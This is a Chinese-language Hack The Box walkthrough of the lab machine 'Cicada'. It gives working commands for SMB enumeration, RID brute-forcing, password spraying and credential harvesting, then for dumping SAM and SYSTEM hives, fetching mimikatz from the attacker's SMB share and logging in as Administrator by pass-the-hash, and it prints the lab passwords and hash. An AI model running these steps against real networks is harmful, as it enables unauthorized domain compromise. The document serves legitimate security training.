目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
将靶机TCP开放端口号提取并保存
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用nmap对靶机UDP开放端口进行脚本、服务扫描
使用smbmap枚举靶机SMB共享
继续使用smbmap递归枚举HR共享
边界突破
使用netexec通过爆破靶机RID以枚举域内用户
使用netexec通过上述名单以及默认密码进行密码喷洒
使用netexec通过上述凭证枚举靶机AD域内用户信息
使用smbmap通过上述凭证再次枚举靶机SMB服务共享
使用evil-winrm通过上述凭证登录靶机Win-RM服务
权限提升
查看当前用户账户信息
将系统中的SAM、SYSTEM文件备份到当前目录
在攻击机本地开启一个SMB服务器以便传输文件
控制靶机将攻击机中的mimikatz上传至靶机
使用mimikatz通过SAM、SYSTEM文件解析出密码哈希
使用evil-winrm通过上述凭证登录靶机Win-RM服务
连接至HTB服务器并启动靶机
分配IP:10.10.16.22
靶机IP:10.10.11.35
靶机Domain:cicada.htb
信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.11.35 -r 1-65535 --ulimit 5000 | tee res
将靶机TCP开放端口号提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,
53,88,135,139,389,445,464,593,636,3268,3269,5985,64644
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
53,88,135,139,389,445,464,593,636,3268,3269,5985,64644
使用nmap对靶机TCP开放端口进行脚本、服务扫描
nmap -sT -p$ports -sCV -Pn 10.10.11.35
- 需要重点关注的服务和信息
AD域名:cicada.htb
53端口:Domain服务
88端口:Kerberos服务
389端口:LDAP服务
445端口:SMB服务
5985端口:Win-RM服务
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.35
使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.11.35
使用nmap对靶机UDP开放端口进行脚本、服务扫描
nmap -sU -p53,123 -sCV -Pn 10.10.11.35使用smbmap枚举靶机SMB共享
smbmap -u guest -H cicada.htb
继续使用smbmap递归枚举HR共享
smbmap -u guest -H cicada.htb -r HR --depth 5
- 将HR共享中的Notice from HR.txt文件下载到攻击机本地
smbmap -u guest -H cicada.htb -r HR --depth 5 --download './HR/Notice from HR.txt'
- 查看该文件内容
cat '10.10.11.35-HR_Notice from HR.txt'
- 由该文本可知,新雇员默认密码为:Cicada$M6Corpb*@Lp#nZp!8
边界突破
使用netexec通过爆破靶机RID以枚举域内用户
netexec smb cicada.htb -u guest -p '' --rid-brute
- 通过切割字符串使其只输出用户名部分
netexec smb cicada.htb -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | awk '{print $1}'┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# netexec smb cicada.htb -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | awk '{print $1}'
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
- 将用户名存入名单文件中以便利用
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat << EOF > names.txt
heredoc> Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
heredoc> EOF
使用netexec通过上述名单以及默认密码进行密码喷洒
netexec smb cicada.htb -u ./names.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
账户:michael.wrightson
密码:Cicada$M6Corpb*@Lp#nZp!8
使用netexec通过上述凭证枚举靶机AD域内用户信息
netexec smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
账户:david.orelious
密码:aRt$Lp#7t*VQ!3
使用smbmap通过上述凭证再次枚举靶机SMB服务共享
smbmap -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H cicada.htb
- 继续使用smbmap枚举DEV共享内容
smbmap -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H cicada.htb -r DEV
- 将DEV共享中的Backup_script.ps1文件下载到攻击机本地
smbmap -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H cicada.htb -r DEV --download './DEV/Backup_script.ps1'
- 查看该文件内容
cat 10.10.11.35-DEV_Backup_script.ps1$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"- 审计文件内容可得一凭证
账户:emily.oscars
密码:Q!3@Lp#M6b*7t*Vt
使用evil-winrm通过上述凭证登录靶机Win-RM服务
evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
- 在C:\Users\emily.oscars.CICADA\Desktop目录下找到user.txt文件
权限提升
查看当前用户账户信息
net user emily.oscars
- 由输出可见,当前账户属于`文件备份操作者(Backup Operators)`组,这意味着当前用户可以直接备份系统中的任何文件
将系统中的SAM、SYSTEM文件备份到当前目录
reg save HKLM\SAM .\SAMreg save HKLM\SYSTEM .\SYSTEM
在攻击机本地开启一个SMB服务器以便传输文件
impacket-smbserver temp . -smb2support- 控制靶机连接至攻击机SMB服务器
net use Z: \\10.10.16.22\temp控制靶机将攻击机中的mimikatz上传至靶机
copy \\10.10.16.22\temp\mimikatz64.exe .
使用mimikatz通过SAM、SYSTEM文件解析出密码哈希
.\mimikatz64.exe "lsadump::sam /sam:sam /system:system" exit
账户:Administrator
密码哈希:2b87e7c93a3e8a0ea4a581937016f341
使用evil-winrm通过上述凭证登录靶机Win-RM服务
evil-winrm -i cicada.htb -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
- 在C:\Users\Administrator\Desktop目录下找到root.txt文件。祝各位2025新年快乐!:=)
